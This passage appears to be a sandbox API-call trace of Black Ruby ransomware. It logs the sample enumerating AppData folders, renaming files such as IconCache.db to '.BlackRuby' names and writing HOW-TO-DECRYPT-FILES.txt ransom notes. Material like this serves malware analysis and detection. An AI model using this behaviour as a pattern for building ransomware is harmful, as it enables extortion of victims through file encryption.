ftCreationTime.dwLowDateTime=0x90d3ed0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x90d3ed0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0x257afb40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1465d0)) returned 1 [0049.121] GetLastError () returned 0xb7 [0049.121] SetErrorMode (uMode=0x0) returned 0x1 [0049.121] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\iconcache.db"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Encrypted_RdADiPVjJM9uiJlkffV2vT5sagotkhzMT5fVPo.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\local\\encrypted_rdadipvjjm9uijlkffv2vt5sagotkhzmt5fvpo.blackruby")) returned 1 [0049.122] GetLastError () returned 0xb7 [0049.122] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x37 [0049.122] GetLastError () returned 0xb7 [0049.122] SetErrorMode (uMode=0x1) returned 0x0 [0049.122] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.122] GetLastError () returned 0x5 [0049.124] SetErrorMode (uMode=0x0) returned 0x1 [0049.124] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe", lpFilePart=0x0) returned 0x24 [0049.124] GetLastError () returned 0x5 [0049.124] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.124] GetLastError () returned 0x5 [0049.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.124] GetLastError () returned 0x5 [0049.124] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe", lpFilePart=0x0) returned 0x24 [0049.124] GetLastError () returned 0x5 [0049.124] SetErrorMode (uMode=0x1) returned 0x0 [0049.124] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.125] GetLastError () returned 0x5 [0049.125] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.125] GetLastError () returned 0x5 [0049.125] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.125] GetLastError () returned 0x5 [0049.125] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.125] GetLastError () returned 0x5 [0049.125] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.125] GetLastError () returned 0x12 [0049.125] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.125] SetErrorMode (uMode=0x0) returned 0x1 [0049.125] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe", lpFilePart=0x0) returned 0x24 [0049.125] GetLastError () returned 0x12 [0049.125] SetErrorMode (uMode=0x1) returned 0x0 [0049.125] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.125] GetLastError () returned 0x12 [0049.126] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.126] GetLastError () returned 0x12 [0049.126] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.126] GetLastError () returned 0x12 [0049.126] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.126] GetLastError () returned 0x12 [0049.126] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.126] GetLastError () returned 0x12 [0049.126] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.126] SetErrorMode (uMode=0x0) returned 0x1 [0049.126] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x2c [0049.126] GetLastError () returned 0x12 [0049.126] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.126] GetLastError () returned 0x12 [0049.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.127] GetLastError () returned 0x12 [0049.127] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x2c [0049.127] GetLastError () returned 0x12 [0049.127] SetErrorMode (uMode=0x1) returned 0x0 [0049.127] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.127] GetLastError () returned 0x12 [0049.127] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.127] GetLastError () returned 0x12 [0049.127] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.127] GetLastError () returned 0x12 [0049.127] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.127] GetLastError () returned 0x12 [0049.127] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.128] SetErrorMode (uMode=0x0) returned 0x1 [0049.128] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x2c [0049.128] GetLastError () returned 0x12 [0049.128] SetErrorMode (uMode=0x1) returned 0x0 [0049.128] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.128] GetLastError () returned 0x12 [0049.128] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.128] GetLastError () returned 0x12 [0049.128] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.128] GetLastError () returned 0x12 [0049.128] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.128] GetLastError () returned 0x12 [0049.128] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.128] SetErrorMode (uMode=0x0) returned 0x1 [0049.128] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x31 [0049.128] GetLastError () returned 0x12 [0049.129] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.129] GetLastError () returned 0x12 [0049.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.129] GetLastError () returned 0x12 [0049.129] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x31 [0049.129] GetLastError () returned 0x12 [0049.129] SetErrorMode (uMode=0x1) returned 0x0 [0049.129] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.130] GetLastError () returned 0x12 [0049.130] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.130] GetLastError () returned 0x12 [0049.130] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.130] GetLastError () returned 0x12 [0049.130] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.130] GetLastError () returned 0x12 [0049.130] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.130] GetLastError () returned 0x12 [0049.130] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.130] GetLastError () returned 0x12 [0049.130] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.130] GetLastError () returned 0x12 [0049.130] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.131] GetLastError () returned 0x12 [0049.131] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.131] SetErrorMode (uMode=0x0) returned 0x1 [0049.131] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0", lpFilePart=0x0) returned 0x31 [0049.131] GetLastError () returned 0x12 [0049.131] SetErrorMode (uMode=0x1) returned 0x0 [0049.131] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.132] GetLastError () returned 0x12 [0049.132] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.132] GetLastError () returned 0x12 [0049.132] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.132] GetLastError () returned 0x12 [0049.133] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.133] GetLastError () returned 0x12 [0049.133] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.133] GetLastError () returned 0x12 [0049.133] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.133] GetLastError () returned 0x12 [0049.133] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.133] GetLastError () returned 0x12 [0049.133] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.133] GetLastError () returned 0x12 [0049.133] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.134] SetErrorMode (uMode=0x0) returned 0x1 [0049.134] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", lpFilePart=0x0) returned 0x44 [0049.134] GetLastError () returned 0x12 [0049.134] SetErrorMode (uMode=0x1) returned 0x0 [0049.134] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), fInfoLevelId=0x0, lpFileInformation=0x1b43fe4 | out: lpFileInformation=0x1b43fe4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebdb3e10, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xebdb3e10, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xe208d430, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0x85d2)) returned 1 [0049.140] GetLastError () returned 0x12 [0049.140] SetErrorMode (uMode=0x0) returned 0x1 [0049.141] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4a [0049.141] GetLastError () returned 0x12 [0049.141] SetErrorMode (uMode=0x1) returned 0x0 [0049.141] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.141] GetLastError () returned 0x0 [0049.141] GetFileType (hFile=0x184) returned 0x1 [0049.141] SetErrorMode (uMode=0x0) returned 0x1 [0049.141] GetFileType (hFile=0x184) returned 0x1 [0049.142] WriteFile (in: hFile=0x184, lpBuffer=0x1b5fa38*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ebe8, lpOverlapped=0x0 | out: lpBuffer=0x1b5fa38*, lpNumberOfBytesWritten=0x18ebe8*=0x18da, lpOverlapped=0x0) returned 1 [0049.143] GetLastError () returned 0x0 [0049.143] CloseHandle (hObject=0x184) returned 1 [0049.143] GetLastError () returned 0x0 [0049.143] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4a [0049.143] GetLastError () returned 0x0 [0049.143] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.143] GetLastError () returned 0x0 [0049.143] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", lpFilePart=0x0) returned 0x43 [0049.143] GetLastError () returned 0x0 [0049.143] SetErrorMode (uMode=0x1) returned 0x0 [0049.143] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), fInfoLevelId=0x0, lpFileInformation=0x1b61714 | out: lpFileInformation=0x1b61714*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebdb3e10, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xebdb3e10, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xe208d430, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0x21cdb)) returned 1 [0049.143] GetLastError () returned 0x0 [0049.143] SetErrorMode (uMode=0x0) returned 0x1 [0049.144] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4a [0049.144] GetLastError () returned 0x0 [0049.144] SetErrorMode (uMode=0x1) returned 0x0 [0049.144] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.144] GetLastError () returned 0x5 [0049.146] SetErrorMode (uMode=0x0) returned 0x1 [0049.146] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents", lpFilePart=0x0) returned 0x42 [0049.146] GetLastError () returned 0x5 [0049.146] SetErrorMode (uMode=0x1) returned 0x0 [0049.146] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), fInfoLevelId=0x0, lpFileInformation=0x1b7f4fc | out: lpFileInformation=0x1b7f4fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdcf4e950, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xdcf4e950, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xef6ef190, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0x1400)) returned 1 [0049.146] GetLastError () returned 0x5 [0049.146] SetErrorMode (uMode=0x0) returned 0x1 [0049.147] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4a [0049.147] GetLastError () returned 0x5 [0049.147] SetErrorMode (uMode=0x1) returned 0x0 [0049.147] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.147] GetLastError () returned 0x5 [0049.148] SetErrorMode (uMode=0x0) returned 0x1 [0049.149] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", nBufferLength=0x105, lpBuffer=0x18e7dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin", lpFilePart=0x0) returned 0x3f [0049.149] GetLastError () returned 0x5 [0049.149] SetErrorMode (uMode=0x1) returned 0x0 [0049.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\UserCache.bin" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\usercache.bin"), fInfoLevelId=0x0, lpFileInformation=0x1b9d2ac | out: lpFileInformation=0x1b9d2ac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdb83f430, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xdb83f430, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xe233acf0, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0x12dc6)) returned 1 [0049.149] GetLastError () returned 0x5 [0049.149] SetErrorMode (uMode=0x0) returned 0x1 [0049.150] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e688, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x4a [0049.150] GetLastError () returned 0x5 [0049.150] SetErrorMode (uMode=0x1) returned 0x0 [0049.150] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0049.150] GetLastError () returned 0x5 [0049.151] SetErrorMode (uMode=0x0) returned 0x1 [0049.151] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", lpFilePart=0x0) returned 0x37 [0049.151] GetLastError () returned 0x5 [0049.151] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.151] GetLastError () returned 0x5 [0049.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.152] GetLastError () returned 0x5 [0049.152] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", lpFilePart=0x0) returned 0x37 [0049.152] GetLastError () returned 0x5 [0049.152] SetErrorMode (uMode=0x1) returned 0x0 [0049.152] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.152] GetLastError () returned 0x5 [0049.152] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.152] GetLastError () returned 0x5 [0049.153] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.153] GetLastError () returned 0x5 [0049.153] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.153] GetLastError () returned 0x12 [0049.153] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.153] SetErrorMode (uMode=0x0) returned 0x1 [0049.153] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache", lpFilePart=0x0) returned 0x37 [0049.153] GetLastError () returned 0x12 [0049.153] SetErrorMode (uMode=0x1) returned 0x0 [0049.153] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.153] GetLastError () returned 0x12 [0049.153] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.153] GetLastError () returned 0x12 [0049.153] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.153] GetLastError () returned 0x12 [0049.154] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.154] GetLastError () returned 0x12 [0049.154] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.154] SetErrorMode (uMode=0x0) returned 0x1 [0049.154] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst", lpFilePart=0x0) returned 0x45 [0049.154] GetLastError () returned 0x12 [0049.154] SetErrorMode (uMode=0x1) returned 0x0 [0049.154] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Cache\\AcroFnt10.lst" (normalized: "c:\\users\\eebsym5\\appdata\\local\\adobe\\acrobat\\10.0\\cache\\acrofnt10.lst"), fInfoLevelId=0x0, lpFileInformation=0x1bbc664 | out: lpFileInformation=0x1bbc664*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xebdb3e10, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xebdb3e10, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0xe208d430, ftLastWriteTime.dwHighDateTime=0x1d35a4f, nFileSizeHigh=0x0, nFileSizeLow=0xcb80)) returned 1 [0049.154] GetLastError () returned 0x12 [0049.154] SetErrorMode (uMode=0x0) returned 0x1 [0049.155] 